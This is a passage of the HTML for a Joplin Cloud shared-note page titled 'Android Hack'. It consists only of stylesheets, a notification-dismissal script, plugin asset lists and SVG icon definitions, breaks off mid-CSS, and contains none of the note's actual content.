
<!doctype html>
<html>
<head>
	<title>Android Hack  - Joplin Cloud</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1" />
	<link rel="stylesheet" href="https://joplincloud.com/css/bulma.min.css" crossorigin="anonymous">
	<link rel="stylesheet" href="https://joplincloud.com/css/main.css" crossorigin="anonymous">
	<link rel="stylesheet" href="https://joplincloud.com/css/fontawesome/css/all.min.css" crossorigin="anonymous">
	<script src="https://joplincloud.com/js/jquery.min.js"></script>
	<script src="https://joplincloud.com/js/main.js"></script>
		<link rel="stylesheet" href="https://joplincloud.com/css/items/note.css" crossorigin="anonymous">
		<script src="https://joplincloud.com/js/items/note.js"></script>
</head>
	<body class="page-note ">
		<main class="main">
			<div class="container main-container">

				<script>
					onDocumentReady(function() {
						const buttons = document.getElementsByClassName('close-notification-button');
						
						for (const button of buttons) {
							button.addEventListener('click', function(event) {
								const closeUrl = button.dataset.closeUrl;
								const notificationId = button.dataset.id;
								fetch(closeUrl, {
									method: 'PATCH',
									headers: { 'Content-Type': 'application/json' },
									body: JSON.stringify({
										read: 1,
									}),
								});

								document.getElementById('notification-' + notificationId).style.display = 'none';
							});
						}
					});
				</script>



						<script>
				const joplinNoteViewer = {
					pluginAssets: [{"name":"katex/katex.css","path":"pluginAssets/katex/katex.css","pathIsAbsolute":false,"mime":"text/css"},{"name":"katex/fonts/KaTeX_AMS-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_AMS-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Caligraphic-Bold.woff2","path":"pluginAssets/katex/fonts/KaTeX_Caligraphic-Bold.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Caligraphic-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Caligraphic-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Fraktur-Bold.woff2","path":"pluginAssets/katex/fonts/KaTeX_Fraktur-Bold.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Fraktur-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Fraktur-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Main-Bold.woff2","path":"pluginAssets/katex/fonts/KaTeX_Main-Bold.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Main-BoldItalic.woff2","path":"pluginAssets/katex/fonts/KaTeX_Main-BoldItalic.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Main-Italic.woff2","path":"pluginAssets/katex/fonts/KaTeX_Main-Italic.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Main-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Main-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Math-BoldItalic.woff2","path":"pluginAssets/katex/fonts/KaTeX_Math-BoldItalic.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Math-Italic.woff2","path":"pluginAssets/katex/fonts/KaTeX_Math-Italic.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_SansSerif-Bold.woff2","path":"pluginAssets/katex/fonts/KaTeX_SansSerif-Bold.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_SansSerif-Italic.woff2","path":"pluginAssets/katex/fonts/KaTeX_SansSerif-Italic.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_SansSerif-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_SansSerif-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Script-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Script-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Size1-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Size1-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Size2-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Size2-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Size3-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Size3-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Size4-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Size4-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"katex/fonts/KaTeX_Typewriter-Regular.woff2","path":"pluginAssets/katex/fonts/KaTeX_Typewriter-Regular.woff2","pathIsAbsolute":false,"mime":"application/octet-stream"},{"name":"mermaid/mermaid.min.js","path":"pluginAssets/mermaid/mermaid.min.js","pathIsAbsolute":false,"mime":"application/javascript"},{"name":"mermaid/mermaid_render.js","path":"pluginAssets/mermaid/mermaid_render.js","pathIsAbsolute":false,"mime":"application/javascript"},{"name":"highlight.js/atom-one-light.css","path":"pluginAssets/highlight.js/atom-one-light.css","pathIsAbsolute":false,"mime":"text/css"}],
					appBaseUrl: "https://joplincloud.com",
				};
			</script>

<style>
				/*
					FOR THE MARKDOWN EDITOR
				*/

				/* Remove the indentation from the checkboxes at the root of the document
				   (otherwise they are too far right), but keep it for their children to allow
				   nested lists. Make sure this value matches the UL margin. */

				li.md-checkbox {
					list-style-type: none;
				}

				li.md-checkbox input[type=checkbox] {
					margin-left: -1.71em;
					margin-right: 0.7em;
				}
				
				ul.joplin-checklist {
					list-style:none;
				}

				/*
					FOR THE RICH TEXT EDITOR
				*/

				ul.joplin-checklist li::before {
					content:"\f14a";
					font-family:"Font Awesome 5 Free";
					background-size: 16px 16px;
					pointer-events: all;
					cursor: pointer;
					width: 1em;
					height: 1em;
					margin-left: -1.3em;
					position: absolute;
					color: #32373F;
				}

				.joplin-checklist li:not(.checked)::before {
					content:"\f0c8";
				}

				.fountain {
					font-family: monospace;
					line-height: 107%;
					max-width: 1000px;
					margin-left: auto;
					margin-right: auto;
				}

				.fountain .title-page,
				.fountain .page { 
					box-shadow: 0 0 5px rgba(0,0,0,0.1);
					border: 1px solid #d2d2d2;
					padding: 10%;
					margin-bottom: 2em;
				}

				.fountain h1,
				.fountain h2,
				.fountain h3,
				.fountain h4,
				.fountain p {
					font-weight: normal;
					line-height: 107%;
					margin: 1em 0;
					border: none;
					font-size: 1em;
				}

				.fountain .bold {
					font-weight: bold;
				}

				.fountain .underline {
					text-decoration: underline;
				}

				.fountain .centered {
					text-align: center;
				}

				.fountain h2 {
					text-align: right;
				}

				.fountain .dialogue p.parenthetical {
					margin-left: 11%;
				}

				.fountain .title-page .credit,
				.fountain .title-page .authors,
				.fountain .title-page .source {
					text-align: center;
				}

				.fountain .title-page h1 {
					margin-bottom: 1.5em;
					text-align: center;
				}

				.fountain .title-page .source {
					margin-top: 1.5em;
				}

				.fountain .title-page .notes {
					text-align: right;
					margin: 3em 0;
				}

				.fountain .title-page h1 {
					margin-bottom: 1.5em;
					text-align: center;
				}

				.fountain .dialogue {
					margin-left: 3em;
					margin-right: 3em;
				}

				.fountain .dialogue p,
				.fountain .dialogue h1,
				.fountain .dialogue h2,
				.fountain .dialogue h3,
				.fountain .dialogue h4 {
					margin: 0;
				}

				.fountain .dialogue h1,
				.fountain .dialogue h2,
				.fountain .dialogue h3,
				.fountain .dialogue h4 {
					text-align: center;
				}
.mermaid { background-color: white; width: 640px; }</style>

<div id="joplin-container-pluginAssetsContainer"></div>

<nav class="navbar" role="navigation" aria-label="main navigation">
	<div class="navbar-brand logo-container">
		<a class="navbar-item" href="https://joplincloud.com/home">
			<img class="logo" src="https://joplincloud.com/images/Logo.png"/><span class="logo-text">Joplin</span>
		</a>
	</div>
</nav>

<div class="note-main">
	<p class="last-updated">Last updated: 15 May 22 15:34:33 (UTC)</p>
	<h1 class="title">Android Hack </h1>
	<style>
		/* https://necolas.github.io/normalize.css/ */
		html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
		article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}
		pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}
		b,strong{font-weight:bolder}small{font-size:80%}img{border-style:none}

		body {
			font-size: 15px;
			color: #32373F;
			word-wrap: break-word;
			line-height: 1.6em;
			background-color: #ffffff;
			font-family: 'Avenir', 'Arial', sans-serif;
			padding-bottom: 0px;
			padding-top: 0px;
		}
		kbd {
			border: 1px solid rgb(220, 220, 220);
			box-shadow: inset 0 -1px 0 rgb(220, 220, 220);
			padding: 2px 4px;
			border-radius: 3px;
			background-color: rgb(243, 243, 243);
		}
		::-webkit-scrollbar {
			width: 7px;
			height: 7px;
		}
		::-webkit-scrollbar-corner {
			background: none;
		}
		::-webkit-scrollbar-track {
			border: none;
		}
		::-webkit-scrollbar-thumb {
			background: rgba(100, 100, 100, 0.3); 
			border-radius: 5px;
		}
		::-webkit-scrollbar-track:hover {
			background: rgba(0, 0, 0, 0.1); 
		}
		::-webkit-scrollbar-thumb:hover {
			background: rgba(100, 100, 100, 0.7); 
		}

		

		/* Remove top padding and margin from first child so that top of rendered text is aligned to top of text editor text */

		#rendered-md > h1:first-child,
		#rendered-md > h2:first-child,
		#rendered-md > h3:first-child,
		#rendered-md > h4:first-child,
		#rendered-md > ul:first-child,
		#rendered-md > ol:first-child,
		#rendered-md > table:first-child,
		#rendered-md > blockquote:first-child,
		#rendered-md > img:first-child,
		#rendered-md > p:first-child {
			margin-top: 0;
			padding-top: 0;
		}
		
		p, h1, h2, h3, h4, h5, h6, ul, table {
			margin-top: .6em;
			margin-bottom: 1.35em;

			/*
				Adds support for RTL text in the note body. It automatically detects the direction using the content.
				Issue: https://github.com/laurent22/joplin/issues/3991
			*/
			unicode-bidi: plaintext;
		}

		h1, h2, h3, h4, h5, h6, ul, table {
			margin-bottom: 0.65em;
		}

		h1, h2, h3, h4, h5, h6 {
			line-height: 1.5em;
		}
		h1 {
			font-size: 1.5em;
			font-weight: bold;
			border-bottom: 1px solid #dddddd;
			padding-bottom: .3em;
		}
		h2 {
			font-size: 1.3em;
			font-weight: bold;
			padding-bottom: .1em; */
		}
		h3 {
			font-size: 1.1em;
			font-weight: bold;
		}
		h4, h5, h6 {
			font-size: 1em;
			font-weight: bold;
		}

		.exported-note-title {
			font-size: 2em;
			font-weight: bold;
			margin-bottom: 0.8em;
			line-height: 1.5em;
			padding-bottom: .35em;
			border-bottom: 1px solid #dddddd;
		}

		a {
			color: #155BDA;
		}
		ul, ol {
			padding-left: 0;
			margin-left: 1.7em;
		}
		li {
			margin-bottom: .4em;
		}
		li p {
			margin-top: 0.2em;
			margin-bottom: 0;
		}

		.resource-icon {
			display: inline-block;
			position: relative;
			top: 0.3em;
			text-decoration: none;
			width: 1.2em;
			height: 1.4em;
			margin-right: 0.4em;
			background-color:  #155BDA;
		}
    /* These icons are obtained from the wonderful ForkAwesome project by copying the src svgs 
     * into the css classes below.
     * svgs are obtained from https://github.com/ForkAwesome/Fork-Awesome/tree/master/src/icons/svg
     * instead of the svg width, height property you must use a viewbox here, 0 0 1536 1792 is typically the actual size of the icon
     * each line begins with the pre-amble -webkit-mask: url("data:image/svg+xml;utf8,
     * and of course finishes with ");
     * to precvent artifacts it is also necessary to include -webkit-mask-repeat: no-repeat;
     * on the following line
     * */
		.fa-joplin {
			/* Awesome Font file */
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M373.834 128C168.227 128 0 296.223 0 501.834v788.336C0 1495.778 168.227 1664 373.834 1664h788.336c205.608 0 373.83-168.222 373.83-373.83V501.834C1536 296.224 1367.778 128 1162.17 128zm397.222 205.431h417.424a7.132 7.132 0 0 1 7.132 7.133v132.552c0 4.461-3.619 8.073-8.077 8.073h-57.23c-24.168 0-43.768 19.338-44.284 43.374v2.377h-.017v136.191h-.053l-.466 509.375c-5.02 77.667-39.222 149.056-96.324 201.046-60.28 54.834-141.948 85.017-229.962 85.017-12.45 0-25.208-.61-37.907-1.785-92.157-8.682-181.494-48.601-251.662-112.438-71.99-65.517-117.147-150.03-127.164-238-11.226-98.763 23.42-192.783 95.045-257.937 81.99-74.637 198.185-101.768 316.613-75.704 5.574 1.227 9.55 6.282 9.55 11.997v199.52c-.199 2.625-1.481 6.599-8.183 2.896-.663-.365-1.194-.511-1.653-.531-21.987-10.587-45.159-17.57-68.559-19.916-.38-.04-.757-.124-1.138-.163-.537-.048-1.034-.033-1.556-.075-4.13-.354-8.183-.517-12.203-.58-.87-.011-1.771-.127-2.641-.127-.486 0-.951.05-1.437.057-1.464.011-2.886.115-4.33.163-2.76.102-5.497.211-8.182.448-.273.024-.547.07-.835.097-25.509 2.4-47.864 11.104-65.012 25.47-.954.802-1.974 1.53-2.9 2.36a1.34 1.34 0 0 1-.168.146c-23.96 21.8-34.881 53.872-30.726 90.316 4.62 40.737 26.94 81.156 62.841 113.823 35.908 32.67 80.335 52.977 125.113 57.186 35.118 3.36 66.547-3.919 89.899-20.461a97.255 97.255 0 0 0 9.365-7.501c2.925-2.661 5.569-5.5 8.086-8.416.3-.348.672-.673.975-1.024 8.253-9.864 14.222-21.067 17.996-33.148.639-2.034 1.051-4.148 1.564-6.227.381-1.563.81-3.106 1.112-4.693.555-2.784.923-5.632 1.253-8.49.086-.709.183-1.414.237-2.128.492-4.893.693-9.858.55-14.91h.013V521.623c-2.01-22.626-20.78-40.434-43.928-40.434h-57.23a8.071 8.071 0 0 1-8.077-8.073V340.564a7.132 7.132 0 0 1 7.136-7.133z'/></svg>");
		}
		.fa-file-image {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-128-448v320H256v-192l192-192 128 128 384-384zm-832-192c-106 0-192-86-192-192s86-192 192-192 192 86 192 192-86 192-192 192z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-pdf {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-514-593c25 20 53 38 84 56 42-5 81-7 117-7 67 0 152 8 177 49 7 10 13 28 2 52-1 1-2 3-3 4v1c-3 18-18 38-71 38-64 0-161-29-245-73-139 15-285 46-392 83-103 176-182 262-242 262-10 0-19-2-28-7l-24-12c-3-1-4-3-6-5-5-5-9-16-6-36 10-46 64-123 188-188 8-5 18-2 23 6 1 1 2 3 2 4 31-51 67-116 107-197 45-90 80-178 104-262-32-109-42-221-24-287 7-25 22-40 42-40h22c15 0 27 5 35 15 12 14 15 36 9 68-1 3-2 6-4 8 1 3 1 5 1 8v30c-1 63-2 123-14 192 35 105 87 190 146 238zm-576 411c30-14 73-57 137-158-75 58-122 124-137 158zm398-920c-10 28-10 76-2 132 3-16 5-31 7-44 2-17 5-31 7-43 1-3 2-5 4-8-1-1-1-3-2-5-1-18-7-29-13-36 0 2-1 3-1 4zm-124 661c88-35 186-63 284-81-10-8-20-15-29-23-49-43-93-103-127-176-19 61-47 126-83 197-15 28-30 56-45 83zm646-16c-5-5-31-24-140-24 49 18 94 28 124 28 9 0 14 0 18-1 0-1-1-2-2-3z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-word {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM233 768v107h70l164 661h159l128-485c5-15 8-30 10-46 1-8 2-16 2-24h4l3 24c3 14 4 30 9 46l128 485h159l164-661h70V768h-300v107h90l-99 438c-4 16-6 33-7 46l-2 21h-4c0-6-2-14-3-21-3-13-5-30-9-46L825 768H711l-144 545c-4 16-5 33-8 46l-4 21h-4l-2-21c-1-13-3-30-7-46l-99-438h90V768H233z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-powerpoint {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-992-234v106h327v-106h-93v-167h137c43 0 82-2 118-15 90-31 146-124 146-233s-54-193-137-228c-38-15-84-19-130-19H416v107h92v555h-92zm353-280H650V882h120c35 0 62 6 83 18 36 21 56 62 56 115 0 56-20 99-62 120-21 10-47 15-78 15z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-excel {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zm-979-234v106h281v-106h-75l103-161c12-19 18-34 21-34h2c1 4 3 7 5 10 4 8 10 14 17 24l107 161h-76v106h291v-106h-68l-192-273 195-282h67V768H828v107h74l-103 159c-12 19-21 34-21 33h-2c-1-4-3-7-5-10-4-7-9-14-17-23L648 875h76V768H434v107h68l189 272-194 283h-68z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-audio {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM620 850c12 5 20 17 20 30v544c0 13-8 25-20 30-4 1-8 2-12 2-8 0-16-3-23-9l-166-167H288c-18 0-32-14-32-32v-192c0-18 14-32 32-32h131l166-167c10-9 23-12 35-7zm417 689c19 0 37-8 50-24 83-102 129-231 129-363s-46-261-129-363c-22-28-63-32-90-10-28 23-32 63-9 91 65 80 100 178 100 282s-35 202-100 282c-23 28-19 68 9 90 12 10 26 15 40 15zm-211-148c17 0 34-7 47-20 56-60 87-137 87-219s-31-159-87-219c-24-26-65-27-91-3-25 24-27 65-2 91 33 36 52 82 52 131s-19 95-52 131c-25 26-23 67 2 91 13 11 29 17 44 17z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-video {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM768 768c70 0 128 58 128 128v384c0 70-58 128-128 128H384c-70 0-128-58-128-128V896c0-70 58-128 128-128h384zm492 2c12 5 20 17 20 30v576c0 13-8 25-20 30-4 1-8 2-12 2-8 0-17-3-23-9l-265-266v-90l265-266c6-6 15-9 23-9 4 0 8 1 12 2z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-archive {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M640 384V256H512v128h128zm128 128V384H640v128h128zM640 640V512H512v128h128zm128 128V640H640v128h128zm700-388c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H768v128H640V128H128v1536h1280zM781 943c85 287 107 349 107 349 5 17 8 34 8 52 0 111-108 192-256 192s-256-81-256-192c0-18 3-35 8-52 0 0 21-62 120-396V768h128v128h79c29 0 54 19 62 47zm-141 465c71 0 128-29 128-64s-57-64-128-64-128 29-128 64 57 64 128 64z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-code {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM480 768c11-14 31-17 45-6l51 38c14 11 17 31 6 45l-182 243 182 243c11 14 8 34-6 45l-51 38c-14 11-34 8-45-6l-226-301c-8-11-8-27 0-38zm802 301c8 11 8 27 0 38l-226 301c-11 14-31 17-45 6l-51-38c-14-11-17-31-6-45l182-243-182-243c-11-14-8-34 6-45l51-38c14-11 34-8 45 6zm-620 461c-18-3-29-20-26-37l138-831c3-18 20-29 37-26l63 10c18 3 29 20 26 37l-138 831c-3 18-20 29-37 26z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file-alt, .fa-file-csv {
      /* fork-awesome doesn't have csv so we use the text icon */
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280zM384 800c0-18 14-32 32-32h704c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64zm736 224c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64c0-18 14-32 32-32h704zm0 256c18 0 32 14 32 32v64c0 18-14 32-32 32H416c-18 0-32-14-32-32v-64c0-18 14-32 32-32h704z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		.fa-file {
			-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1468 380c37 37 68 111 68 164v1152c0 53-43 96-96 96H96c-53 0-96-43-96-96V96C0 43 43 0 96 0h896c53 0 127 31 164 68zm-444-244v376h376c-6-17-15-34-22-41l-313-313c-7-7-24-16-41-22zm384 1528V640H992c-53 0-96-43-96-96V128H128v1536h1280z'/></svg>");
      -webkit-mask-repeat: no-repeat;
		}
		blockquote {
			border-left: 4px solid rgb(220, 220, 220);
			padding-left: 1.2em;
			margin-left: 0;
			opacity: 0.7;
		}

		.jop-tinymce table,
		table {
			text-align: left;
			border-collapse: collapse;
			border: 1px solid rgb(220, 220, 220);
			background-color: #ffffff;
		}

		.jop-tinymce table td, .jop-tinymce table th,
		table td, th {
			text-align: left;
			padding: .5em 1em .5em 1em;
			font-size: 15;
			color: #32373F;
			font-family: 'Avenir', 'Arial', sans-serif;
		}

		.jop-tinymce table td,
		table td {
			border: 1px solid rgb(220, 220, 220);
		}

		.jop-tinymce table th,
		table th {
			border: 1px solid rgb(220, 220, 220);
			border-bottom: 2px solid rgb(220, 220, 220);
			background-color: rgb(247, 247, 247);
		}

		.jop-tinymce table tr:nth-child(even),
		table tr:nth-child(even) {
			background-color: rgb(247, 247, 247);
		}

		.jop-tinymce table tr:hover,
		table tr:hover {
			background-color: #e5e5e5;
		}

		hr {
			border: none;
			border-bottom: 2px solid #dddddd;
		}
		img {
			max-width: 100%;
			height: auto;
		}
		
		.inline-code,
		.mce-content-body code {
			border: 1px solid rgb(220, 220, 220);
			background-color: rgb(243, 243, 243);
			padding-right: .2em;
			padding-left: .2em;
			border-radius: .25em;
			color: rgb(0,0,0);
			font-size: .9em;
		}

		.highlighted-keyword {
			background-color: #F3B717;
			color: black;
		}

		.not-loaded-resource img {
			width: 1.15em;
			height: 1.15em;
			background: white;
			padding: 2px !important;
			border-radius: 2px;
			box-shadow: 0 1px 3px #000000aa;
		}

		a.not-loaded-resource img {
			margin-right: .2em;
		}

		a.not-loaded-resource {
			display: flex;
			flex-direction: row;
			align-items: center;
		}

		.md-checkbox input[type=checkbox]:checked {
			opacity: 0.7;
		}

		.jop-tinymce ul.joplin-checklist .checked,
		.md-checkbox .checkbox-label-checked {
			opacity: 0.5;
		}

		.exported-note {
			padding: 1em;
		}

		.joplin-editable .joplin-source {
			display: none;
		}

		mark {
			background: #F7D26E;
			color: black;
		}

		/* =============================================== */
		/* For TinyMCE */
		/* =============================================== */

		.mce-content-body {
			/* Note: we give a bit more padding at the bottom, to allow scrolling past the end of the document */
			padding: 5px 10px 10em 0;
		}

		/*
		.mce-content-body code {
			background-color: transparent;
		}
		*/

		.mce-content-body [data-mce-selected=inline-boundary] {
			background-color: transparent;
		}

		.mce-content-body .joplin-editable {
			cursor: pointer !important;
		}

		.mce-content-body.mce-content-readonly {
			opacity: 0.5;
		}

		/* We need that to make sure click events have the A has a target */
		.katex a span {
			pointer-events: none;
		}

		.media-player {
			width: 100%;
			margin-top: 10px;
		}

		.media-player.media-pdf {
			min-height: 100vh;
		}

		/* Clear the CODE style if the element is within a joplin-editable block */
		.mce-content-body .joplin-editable code {
			border: none;
			background: none;
			padding: 0;
			color: inherit;
			font-size: inherit;
		}

		/* To make code blocks horizontally scrollable */
		/* https://github.com/laurent22/joplin/issues/5740 */
		pre.hljs {
			overflow-x: auto;
		}

		/* =============================================== */
		/* For TinyMCE */
		/* =============================================== */

		@media print {
			body {
				height: auto !important;
			}

			pre {
				white-space: pre-wrap;
			}

			.code, .inline-code {
				border: 1px solid #CBCBCB;
			}

			#joplin-container-content {
				/* The height of the content is set dynamically by JavaScript (in updateBodyHeight) to go
				   around various issues related to scrolling. However when printing we don't want this
				   fixed size as that would crop the content. So we set it to auto here. "important" is
				   needed to override the style set by JavaScript at the element-level. */
				height: auto !important;
			}
		}
	

				/*
					FOR THE MARKDOWN EDITOR
				*/

				/* Remove the indentation from the checkboxes at the root of the document
				   (otherwise they are too far right), but keep it for their children to allow
				   nested lists. Make sure this value matches the UL margin. */

				li.md-checkbox {
					list-style-type: none;
				}

				li.md-checkbox input[type=checkbox] {
					margin-left: -1.71em;
					margin-right: 0.7em;
				}
				
				ul.joplin-checklist {
					list-style:none;
				}

				/*
					FOR THE RICH TEXT EDITOR
				*/

				ul.joplin-checklist li::before {
					content:"\f14a";
					font-family:"Font Awesome 5 Free";
					background-size: 16px 16px;
					pointer-events: all;
					cursor: pointer;
					width: 1em;
					height: 1em;
					margin-left: -1.3em;
					position: absolute;
					color: #32373F;
				}

				.joplin-checklist li:not(.checked)::before {
					content:"\f0c8";
				}

				.fountain {
					font-family: monospace;
					line-height: 107%;
					max-width: 1000px;
					margin-left: auto;
					margin-right: auto;
				}

				.fountain .title-page,
				.fountain .page { 
					box-shadow: 0 0 5px rgba(0,0,0,0.1);
					border: 1px solid #d2d2d2;
					padding: 10%;
					margin-bottom: 2em;
				}

				.fountain h1,
				.fountain h2,
				.fountain h3,
				.fountain h4,
				.fountain p {
					font-weight: normal;
					line-height: 107%;
					margin: 1em 0;
					border: none;
					font-size: 1em;
				}

				.fountain .bold {
					font-weight: bold;
				}

				.fountain .underline {
					text-decoration: underline;
				}

				.fountain .centered {
					text-align: center;
				}

				.fountain h2 {
					text-align: right;
				}

				.fountain .dialogue p.parenthetical {
					margin-left: 11%;
				}

				.fountain .title-page .credit,
				.fountain .title-page .authors,
				.fountain .title-page .source {
					text-align: center;
				}

				.fountain .title-page h1 {
					margin-bottom: 1.5em;
					text-align: center;
				}

				.fountain .title-page .source {
					margin-top: 1.5em;
				}

				.fountain .title-page .notes {
					text-align: right;
					margin: 3em 0;
				}

				.fountain .title-page h1 {
					margin-bottom: 1.5em;
					text-align: center;
				}

				.fountain .dialogue {
					margin-left: 3em;
					margin-right: 3em;
				}

				.fountain .dialogue p,
				.fountain .dialogue h1,
				.fountain .dialogue h2,
				.fountain .dialogue h3,
